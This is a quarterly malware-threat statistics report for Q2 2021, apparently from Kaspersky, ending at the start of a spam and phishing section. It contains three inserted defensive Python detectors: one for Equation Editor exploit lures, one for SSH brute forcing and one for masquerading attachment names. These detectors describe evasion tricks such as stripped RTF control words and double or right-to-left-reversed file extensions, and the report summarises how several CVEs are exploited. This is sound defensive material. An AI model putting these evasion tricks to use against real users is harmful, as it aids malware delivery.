  • Ransomware attacks were defeated on the computers of 97,451 unique users.
  • Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.
Financial threats

Financial threat statistics

In Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.

Number of unique users attacked by financial malware, Q2 2021

Geography of financial malware attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country.

Geography of financial malware attacks, Q2 2021

Top 10 countries by share of attacked users

Rank  Country*  %**
1   Turkmenistan   5.8
2   Tajikistan   5.0
3   Afghanistan   4.2
4   Uzbekistan   3.3
5   Lithuania   2.9
6   Sudan   2.8
7   Paraguay   2.5
8   Zimbabwe   1.6
9   Costa Rica   1.5
10  Yemen   1.5

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

As usual, the most widespread banker family in Q2 was ZeuS/Zbot (17.8%), though its share almost halved, falling 13 p.p. from the previous quarter. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which gained 5 p.p. and climbed from eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the takedown of its infrastructure in the previous quarter.

Top 10 banking malware families

Rank  Name  Verdicts  %*
1   Zbot   Trojan.Win32.Zbot   17.8
2   CliptoShuffler   Trojan-Banker.Win32.CliptoShuffler   9.9
3   SpyEye   Trojan-Spy.Win32.SpyEye   8.8
4   Trickster   Trojan.Win32.Trickster   5.5
5   RTM   Trojan-Banker.Win32.RTM   3.8
6   Danabot   Trojan-Banker.Win32.Danabot   3.6
7   Nimnul   Virus.Win32.Nimnul   3.3
8   Cridex   Backdoor.Win32.Cridex   2.3
9   Nymaim   Trojan.Win32.Nymaim   1.9
10  Neurevt   Trojan.Win32.Neurevt   1.6

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Ransomware programs

Quarterly trends and highlights

Attack on Colonial Pipeline and closure of DarkSide

Ransomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the attack by the DarkSide group on Colonial Pipeline, one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, were reported to US President Joe Biden.

For the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide’s creators heaped the blame on third-party operators. Another post was published stating that DarkSide’s developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.

Another consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.

Closure of Avaddon

Another family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers provided Bleeping Computer with the decryption keys.

Clash with Clop

Ukrainian police conducted searches and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals’ infrastructure, which did not, however, stop the group’s activities.

Attacks on NAS devices

In Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. A new family, Qlocker, appeared, which packs user files into a password-protected 7zip archive, while the long-familiar ech0raix and AgeLocker began to gain momentum.

Number of new ransomware modifications

In Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.

Number of new ransomware modifications, Q2 2020 — Q2 2021

Number of users attacked by ransomware Trojans

In Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q2 2021

Geography of ransomware attacks

Geography of attacks by ransomware Trojans, Q2 2021

Top 10 countries attacked by ransomware Trojans

Rank  Country*  %**
1   Bangladesh   1.85
2   Ethiopia   0.51
3   China   0.49
4   Pakistan   0.40
5   Egypt   0.38
6   Indonesia   0.36
7   Afghanistan   0.36
8   Vietnam   0.35
9   Myanmar   0.35
10  Nepal   0.33

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans

Rank  Name  Verdicts  %*
1   WannaCry   Trojan-Ransom.Win32.Wanna   20.66
2   Stop   Trojan-Ransom.Win32.Stop   19.70
3   (generic verdict)   Trojan-Ransom.Win32.Gen   9.10
4   (generic verdict)   Trojan-Ransom.Win32.Crypren   6.37
5   (generic verdict)   Trojan-Ransom.Win32.Phny   6.08
6   (generic verdict)   Trojan-Ransom.Win32.Encoder   5.87
7   (generic verdict)   Trojan-Ransom.Win32.Agent   5.19
8   PolyRansom/VirLock   Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom   2.39
9   (generic verdict)   Trojan-Ransom.Win32.Crypmod   1.48
10  (generic verdict)   Trojan-Ransom.MSIL.Encoder   1.26

* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware.

Miners

Number of new miner modifications

In Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.

Number of new miner modifications, Q2 2021

Number of users attacked by miners

In Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.

Number of unique users attacked by miners, Q2 2021

Geography of miner attacks

Geography of miner attacks, Q2 2021

Top 10 countries attacked by miners

Rank  Country*  %**
1   Afghanistan   3.99
2   Ethiopia   2.66
3   Rwanda   2.19
4   Uzbekistan   1.61
5   Mozambique   1.40
6   Sri Lanka   1.35
7   Vietnam   1.33
8   Kazakhstan   1.31
9   Azerbaijan   1.21
10  Tanzania   1.19

* Excluded are countries with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyberattacks

Q2 2021 brought some minor changes to our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.

Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021

Microsoft Office exploits most often tried to utilize the memory corruption vulnerability CVE-2018-0802. This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability CVE-2017-11882, which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the CVE-2017-8570 vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.
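Both CVE-2018-0802 and CVE-2017-11882 live in the same Equation Editor (EQNEDT32) component, so the first thing a triage analyst wants to know about a suspicious Office lure is whether it embeds an Equation Editor object at all. The script below is an added example (not Kaspersky's code) that checks for that in the two containers the exploits are usually delivered in: RTF files, where the object is announced by an \objclass control word and carried hex-encoded in \objdata, and OLE compound files, where the object's CLSID sits in binary form in a directory entry. The CLSID of "Microsoft Equation 3.0" is 0002CE02-0000-0000-C000-000000000046; everything else (the simplified OLE1 header in the sample, the documents themselves) is constructed for the example. A hit means "look closer", not "exploit": legitimate old documents embed equations too, and heavily obfuscated RTF (hex split across control words, nonstandard keywords) is not handled here.

```python
import re

# CLSID of "Microsoft Equation 3.0", the Equation Editor object targeted by both CVEs above.
EQUATION_CLSID = "0002CE02-0000-0000-C000-000000000046"
OLE_SIGNATURE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound file (CFB) header magic

RTF_OBJCLASS = re.compile(rb"\\objclass\s*Equation\.[23]", re.IGNORECASE)
RTF_OBJDATA = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def clsid_to_bytes(clsid: str) -> bytes:
    """Encode a printed GUID the way OLE stores it: first three fields little-endian,
    the last two as-is. A text search for the printed form finds nothing in a binary file."""
    a, b, c, d, e = clsid.split("-")
    return (int(a, 16).to_bytes(4, "little") + int(b, 16).to_bytes(2, "little")
            + int(c, 16).to_bytes(2, "little") + bytes.fromhex(d) + bytes.fromhex(e))


EQUATION_CLSID_BYTES = clsid_to_bytes(EQUATION_CLSID)
EQUATION_PROGID = (b"Equation.3", "Equation.3".encode("utf-16-le"))


def scan_document(blob: bytes) -> list:
    """Return the reasons (possibly none) why `blob` looks like it carries an Equation Editor object."""
    reasons = []
    if blob.startswith(b"{\\rtf"):
        if RTF_OBJCLASS.search(blob):
            reasons.append("RTF \\objclass names Equation.x")
        for m in RTF_OBJDATA.finditer(blob):
            # \objdata carries the embedded OLE stream hex-encoded: decode it and look inside
            try:
                raw = bytes.fromhex(re.sub(rb"\s+", b"", m.group(1)).decode("ascii"))
            except ValueError:   # odd length or truncated blob
                continue
            if EQUATION_CLSID_BYTES in raw or any(p in raw for p in EQUATION_PROGID):
                reasons.append("Equation Editor CLSID/ProgID inside hex-encoded \\objdata")
                break
    elif blob.startswith(OLE_SIGNATURE):
        if EQUATION_CLSID_BYTES in blob:
            reasons.append("Equation Editor CLSID in OLE storage")
        if any(p in blob for p in EQUATION_PROGID):
            reasons.append("Equation.3 ProgID in OLE storage")
    return reasons


def build_samples() -> dict:
    """Constructed inputs, not real documents; the OLE1 header in the objdata is simplified."""
    ole1_header = b"\x01\x05\x00\x00\x02\x00\x00\x00\x0b\x00\x00\x00Equation.3\x00"
    embedded = ole1_header + EQUATION_CLSID_BYTES + b"\x00" * 16
    return {
        # objclass present and the CLSID inside objdata: the classic lure layout
        "rtf_equation": b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
                        + embedded.hex().encode() + b"}}}",
        # objclass stripped to dodge naive string matching, CLSID still in the stream
        "rtf_hidden": b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata " + embedded.hex().encode() + b"}}}",
        "rtf_clean": b"{\\rtf1\\ansi Quarterly report, nothing embedded.}",
        "ole_equation": OLE_SIGNATURE + b"\x00" * 32 + EQUATION_CLSID_BYTES + b"\x00" * 32,
        "ole_clean": OLE_SIGNATURE + b"\x00" * 64,
    }


if __name__ == "__main__":
    for name, doc in build_samples().items():
        print(name, "->", scan_document(doc) or "nothing found")
```

The second RTF sample shows why the decoded \objdata must be inspected rather than just the control words: dropping \objclass costs the attacker nothing, but the CLSID has to survive for Word to instantiate the object.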

Q2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:

  • CVE-2021-28310 — an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;
  • CVE-2021-31955 — an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;
  • CVE-2021-31956 — a vulnerability in the ntfs.sys file system driver. It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.

You can read more about these vulnerabilities and their exploitation in our articles PuzzleMaker attacks with Chrome zero-day exploit chain and Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild.

Other security researchers found a number of browser vulnerabilities, including:

  • CVE-2021-33742 — a bug in the Microsoft Trident browser engine (MSHTML) that allows data to be written outside the memory of the object being operated on;
  • Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: CVE-2021-30551 — a data type confusion vulnerability in the V8 scripting engine; CVE-2021-30554 — a use-after-free vulnerability in the WebGL component; and CVE-2021-21220 — a heap corruption vulnerability;
  • Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: CVE-2021-30661 — a use-after-free vulnerability; CVE-2021-30665 — a memory corruption vulnerability; and CVE-2021-30663 — an integer overflow vulnerability.

All of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an unpatched browser.

In Q2, two similar vulnerabilities were found (CVE-2021-31201 and CVE-2021-31199), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.

But the biggest talking point of the quarter was the critical vulnerabilities CVE-2021-1675 and CVE-2021-34527 in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a proof of concept, caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones; in the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-privileged access can take over not only a local machine but also the domain controller, if these systems have not been updated or the available mitigations for these vulnerabilities have not been applied.

Among the network threats in Q2 2021, attempts to brute-force passwords for popular protocols and services (RDP, SSH, MSSQL, etc.) remain common. Attacks using EternalBlue, EternalRomance and similar exploits are still prevalent, although their share is gradually shrinking. New attacks include CVE-2021-31166, a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during the processing of web-server requests. To gain control over target systems, attackers are also using the previously found Netlogon vulnerability (CVE-2020-1472, Zerologon) and, for servers running Microsoft Exchange Server, the vulnerabilities recently discovered while researching targeted attacks by the HAFNIUM group.
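The password brute-forcing mentioned above is one of the few network threats in this section that a defender can detect from ordinary host logs. As an added example (not Kaspersky's code), the following detector reads OpenSSH auth.log lines, keeps a sliding window of failed logins per source address and flags any source exceeding a threshold inside the window, also recording how many distinct user names it tried, which separates a password spray from a targeted guess. The log lines are constructed; the threshold and window are assumptions to tune, the lines are assumed to be in time order, and since syslog timestamps carry no year, one is assumed. RDP and MSSQL brute forcing leaves equivalent traces in Windows event logs, but with a different format that this parser does not cover.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Default OpenSSH failure line. "invalid user" appears when the name does not exist at all.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
WINDOW_SEC = 60      # assumed: failures are counted within a 60-second sliding window
FAILS = 5            # assumed: five failures in the window trips the alarm
LOG_YEAR = 2021      # assumed: syslog timestamps omit the year

# Constructed sample, not a real log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
Jun 14 10:00:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Jun 14 10:00:04 host sshd[1203]: Failed password for root from 203.0.113.5 port 51240 ssh2
Jun 14 10:00:06 host sshd[1205]: Failed password for invalid user admin from 203.0.113.5 port 51244 ssh2
Jun 14 10:00:09 host sshd[1207]: Failed password for invalid user test from 203.0.113.5 port 51250 ssh2
Jun 14 10:00:12 host sshd[1209]: Failed password for invalid user oracle from 203.0.113.5 port 51256 ssh2
Jun 14 10:00:15 host sshd[1211]: Failed password for invalid user ubuntu from 203.0.113.5 port 51260 ssh2
Jun 14 10:03:40 host sshd[1240]: Failed password for alice from 198.51.100.7 port 40022 ssh2
Jun 14 10:04:02 host sshd[1242]: Accepted password for alice from 198.51.100.7 port 40023 ssh2
Jun 14 12:30:00 host sshd[1500]: Failed password for root from 203.0.113.5 port 52000 ssh2
"""


def parse_ts(s: str, year: int = LOG_YEAR) -> datetime:
    """Turn a syslog 'Mon DD HH:MM:SS' stamp into a datetime, supplying the missing year."""
    return datetime.strptime(f"{year} {s}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, window_sec: int = WINDOW_SEC, threshold: int = FAILS) -> dict:
    """Return {ip: {max_in_window, total_failures, users}} for every source whose failed
    logins reached `threshold` within any `window_sec` span. Lines must be in time order."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    peak = defaultdict(int)       # ip -> largest window count seen
    total = defaultdict(int)
    users = defaultdict(set)
    for line in lines:
        m = FAILED.search(line)
        if not m:
            continue                      # successes and unrelated lines are ignored
        ts, ip = parse_ts(m["ts"]), m["ip"]
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_sec:
            q.popleft()                   # drop failures older than the window
        peak[ip] = max(peak[ip], len(q))
        total[ip] += 1
        users[ip].add(m["user"])
    return {
        ip: {"max_in_window": peak[ip], "total_failures": total[ip], "users": sorted(users[ip])}
        for ip in peak if peak[ip] >= threshold
    }


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['max_in_window']} failures in {WINDOW_SEC}s, "
              f"{info['total_failures']} total, users tried: {', '.join(info['users'])}")
```

On the sample, 203.0.113.5 is flagged with six failures in the window and five distinct user names, while the single mistyped password from 198.51.100.7 followed by a success is not. The isolated failure at 12:30 from the same attacker does not re-trigger the alert on its own but is still counted in the total, which is the number worth correlating with firewall logs afterwards.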

Attacks on macOS

As for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.

Top 20 threats for macOS

Rank  Verdict  %*
1   AdWare.OSX.Pirrit.j   14.47
2   AdWare.OSX.Pirrit.ac   13.89
3   AdWare.OSX.Pirrit.o   10.21
4   AdWare.OSX.Pirrit.ae   7.96
5   AdWare.OSX.Bnodlero.at   7.94
6   Monitor.OSX.HistGrabber.b   7.82
7   Trojan-Downloader.OSX.Shlayer.a   7.69
8   AdWare.OSX.Bnodlero.bg   7.28
9   AdWare.OSX.Pirrit.aa   6.84
10  AdWare.OSX.Pirrit.gen   6.44
11  AdWare.OSX.Cimpli.m   5.53
12  Trojan-Downloader.OSX.Agent.h   5.50
13  Backdoor.OSX.Agent.z   4.64
14  Trojan-Downloader.OSX.Lador.a   3.92
15  AdWare.OSX.Bnodlero.t   3.64
16  AdWare.OSX.Bnodlero.bc   3.36
17  AdWare.OSX.Ketin.h   3.25
18  AdWare.OSX.Bnodlero.ay   3.08
19  AdWare.OSX.Pirrit.q   2.84
20  AdWare.OSX.Pirrit.x   2.56

* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

As in the previous quarter, 15 of the Top 20 threats for macOS are adware programs. The Pirrit and Bnodlero families have traditionally stood out from the crowd, with Pirrit alone accounting for roughly two-thirds of the adware in the list.

Geography of threats for macOS

Geography of threats for macOS, Q2 2021

Top 10 countries by share of attacked users

Rank  Country*  %**
1   India   3.77
2   France   3.67
3   Spain   3.45
4   Canada   3.08
5   Italy   3.00
6   Mexico   2.88
7   Brazil   2.82
8   USA   2.69
9   Australia   2.53
10  Great Britain   2.33

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.

IoT attacks

IoT threat statistics

In Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.

Telnet   70.55%
SSH      29.45%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021

The statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.

Telnet   63.06%
SSH      36.94%

Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021

Top 10 threats delivered to IoT devices via Telnet

Rank  Verdict  %*
1   Backdoor.Linux.Mirai.b   30.25
2   Trojan-Downloader.Linux.NyaDrop.b   27.93
3   Backdoor.Linux.Mirai.ba   5.82
4   Backdoor.Linux.Agent.bc   5.10
5   Backdoor.Linux.Gafgyt.a   4.44
6   Trojan-Downloader.Shell.Agent.p   3.22
7   RiskTool.Linux.BitCoinMiner.b   2.90
8   Backdoor.Linux.Gafgyt.bj   2.47
9   Backdoor.Linux.Mirai.cw   2.52
10  Backdoor.Linux.Mirai.ad   2.28

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Detailed IoT threat statistics are published in our Q2 2021 DDoS report: https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious or infected web pages. Cybercriminals create such sites deliberately; web resources with user-generated content (forums, for example) and compromised legitimate sites can also become infected.

Countries that serve as sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web-attack sources by country, Q2 2021

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Rank  Country*  % of attacked users**
1   Belarus   23.65
2   Mauritania   19.04
3   Moldova   18.88
4   Ukraine   18.37
5   Kyrgyzstan   17.53
6   Algeria   17.51
7   Syria   15.17
8   Uzbekistan   15.16
9   Kazakhstan   14.80
10  Tajikistan   14.70
11  Russia   14.54
12  Yemen   14.38
13  Tunisia   13.40
14  Estonia   13.36
15  Latvia   13.23
16  Libya   13.04
17  Armenia   12.95
18  Morocco   12.39
19  Saudi Arabia   12.16
20  Macao   11.67

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one Malware-class web attack.

Geography of web-based malware attacks, Q2 2021

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or on removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in a concealed form (for example, programs inside complex installers, encrypted files, etc.).

In Q2 2021, our File Anti-Virus detected 68,294,298 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users**
1 Turkmenistan 49.38
2 Tajikistan 48.11
3 Afghanistan 46.52
4 Uzbekistan 44.21
5 Ethiopia 43.69
6 Yemen 43.64
7 Cuba 38.71
8 Myanmar 36.12
9 Syria 35.87
10 South Sudan 35.22
11 China 35.14
12 Kyrgyzstan 34.91
13 Bangladesh 34.63
14 Venezuela 34.15
15 Benin 32.94
16 Algeria 32.83
17 Iraq 32.55
18 Madagascar 31.68
19 Mauritania 31.60
20 Belarus 31.38

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

Geography of local infection attempts, Q2 2021

On average worldwide, Malware-class local threats were recorded on 15.56% of users’ computers at least once during the quarter. Russia scored 17.52% in this rating.

5 August 2021

Spam and phishing in Q2 2021

Quarterly highlights

The corporate sector

In Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.

Cybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer. Such “offers” usually require the victim to pay a small amount upfront to claim their non-existent reward.

In addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named “Договор №8883987726 от 10.10.2021.pdf.exe” (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.
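The attachment name above relies on a second, executable extension hiding behind a document extension, which a mail gateway can flag before the file reaches a user. The following added example is not Kaspersky's code: the extension lists and the sample names other than the one quoted in the report are constructed assumptions, and the check also covers space-padded names and right-to-left override characters, two variants of the same trick that the report does not discuss.

```python
"""Flag mail attachment names that masquerade as documents, e.g. "...pdf.exe".

Added example, not Kaspersky's code. Extension lists and sample names are
constructed for illustration; only the first sample name is quoted from the report.
"""
import os
import unicodedata
from typing import Dict, Iterable, NamedTuple, Optional, Tuple

# File types a recipient expects to open as harmless documents or images (assumption).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
                 "txt", "rtf", "odt", "jpg", "jpeg", "png"}
# File types Windows runs directly (assumption: illustrative, not exhaustive).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "msi", "lnk", "ps1"}
# Containers whose members need their own check (the report notes archives as wrappers).
ARCHIVE_EXTS = {"zip", "rar", "7z", "iso", "img"}
# Unicode bidi override/embedding characters that reverse how a name is displayed.
BIDI_CONTROLS = "\u202a\u202b\u202c\u202d\u202e"


class Verdict(NamedTuple):
    suspicious: bool
    reason: str
    shown_as: Optional[str]   # extension the recipient is led to believe
    real_ext: Optional[str]   # extension that decides how the OS opens the file


def _normalize(name: str) -> Tuple[str, bool]:
    """Return (cleaned basename, had_bidi_override)."""
    # NFKC folds full-width punctuation and letters, so "pdf．exe" reads as "pdf.exe".
    name = unicodedata.normalize("NFKC", name)
    # Ignore any directory part, whichever separator the sender used.
    name = os.path.basename(name.replace("\\", "/"))
    had_bidi = any(ch in BIDI_CONTROLS for ch in name)
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS), had_bidi


def check_attachment_name(name: str) -> Verdict:
    """Classify one attachment filename.

    Rules (case-insensitive, whitespace around each extension ignored so
    "invoice.pdf          .scr" is caught):
      1. Executable final extension with an earlier document extension
         -> double-extension masquerade, the pattern from the report.
      2. Any bidi override character -> flagged regardless of extensions.
      3. Executable final extension without a decoy -> still flagged.
      4. Archive -> not judged here; the caller should inspect its members.
    """
    clean, had_bidi = _normalize(name)
    parts = [p.strip().lower() for p in clean.split(".")]
    exts = parts[1:]                     # everything after the stem
    real = exts[-1] if exts else None
    decoys = [e for e in exts[:-1] if e in DOCUMENT_EXTS]
    shown = decoys[-1] if decoys else None
    if had_bidi:
        return Verdict(True, "bidi override in name", shown, real)
    if real is None:
        return Verdict(False, "no extension", None, None)
    if real in EXECUTABLE_EXTS:
        if shown:
            return Verdict(True, "double extension masquerade", shown, real)
        return Verdict(True, "bare executable attachment", None, real)
    if real in ARCHIVE_EXTS:
        return Verdict(False, "archive: inspect members", shown, real)
    return Verdict(False, "non-executable extension", shown, real)


def flag_attachments(names: Iterable[str]) -> Dict[str, str]:
    """Map every suspicious name to the reason it was flagged."""
    verdicts = {n: check_attachment_name(n) for n in names}
    return {n: v.reason for n, v in verdicts.items() if v.suspicious}


# Constructed sample set; only the first entry is taken from the report.
SAMPLE_ATTACHMENTS = [
    "Договор №8883987726 от 10.10.2021.pdf.exe",
    "invoice_Q2.pdf          .scr",
    "order_confirmation.PDF",
    "photo\u202efdp.exe",
    "docs.zip",
    "readme",
]

if __name__ == "__main__":
    for name, reason in flag_attachments(SAMPLE_ATTACHMENTS).items():
        print(f"{name!r}: {reason}")
```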

COVID-19 compensation fraud

In Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. “The UK Government” and “the US Department of the Treasury” were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.

It was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. To make the pages look official, the scammers described in detail the system of payouts depending on the applicant’s line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.

Parcel scam: buy one, get none

Unexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the “mail company” could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.

